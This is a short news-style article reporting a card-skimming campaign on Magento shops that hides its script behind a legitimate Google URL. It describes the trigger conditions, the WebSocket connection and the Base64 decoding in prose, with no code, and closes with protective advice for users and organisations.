Google’s security has been breached, and hackers are using it to spread malware. This new malware starts with a script hidden on e-commerce websites that use Magento. The script references a legitimate Google URL, making it seem harmless. But the problem is that hackers have tweaked the URL’s parameters to decode and run JavaScript code.
This code is sneaky because it uses Google’s domain, making it appear trustworthy. Most security systems, like Content Security Policies or DNS Filters, let it pass without raising any alarms. The script doesn’t work randomly, though. It only kicks in under certain conditions, like when it detects an automated browser or a URL with the word “Checkout” that leads to a payment page.
When that happens, the malware opens a secret connection to the hacker’s server using WebSocket. This lets the hackers adjust the malware’s behavior to fit the user’s actions. The malware is encoded in Base64, decoded, and run dynamically using JavaScript’s Function constructor. This allows hackers to run code in the browser in real-time.
One reason this malware is so effective is that it can evade most leading antivirus programs, including those on Android and static malware scanners. The script’s logic is complex and only works under specific conditions, making it hard to detect.
So, how can you protect yourself? Currently, DNS-based filters and firewall rules offer limited protection because the initial request appears to be a legitimate connection to Google’s domain. In organizations, Endpoint Protection systems might struggle to detect the malware if they rely too much on the domain’s reputation or don’t check for dynamic script running in the browser.
Even with advanced analysis tools, average users are still at high risk. To reduce this risk, it’s a good idea to limit third-party scripts, separate browser sessions for financial transactions, and be cautious of unexpected website behavior.
Source: